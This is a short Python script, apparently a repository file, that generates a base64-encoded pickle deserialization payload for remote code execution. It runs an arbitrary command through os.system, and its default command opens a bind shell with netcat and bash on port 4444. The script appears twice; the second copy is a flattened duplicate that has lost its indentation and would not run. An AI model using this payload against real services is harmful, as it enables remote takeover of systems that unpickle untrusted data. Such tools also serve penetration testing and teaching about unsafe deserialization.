kriss-u/pickle-payload-py3.py

## pickle-payload-py3.py
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#

import pickle
import sys
import base64

DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

print(base64.b64encode(pickle.dumps(PickleRce())).decode('utf-8'))
	#!/usr/bin/python
	#
	# Pickle deserialization RCE payload.
	# To be invoked with command to execute at it's first parameter.
	# Otherwise, the default one will be used.
	#

	import pickle
	import sys
	import base64

	DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
	COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

	class PickleRce(object):
	def __reduce__(self):
	import os
	return (os.system,(COMMAND,))

	print(base64.b64encode(pickle.dumps(PickleRce())).decode('utf-8'))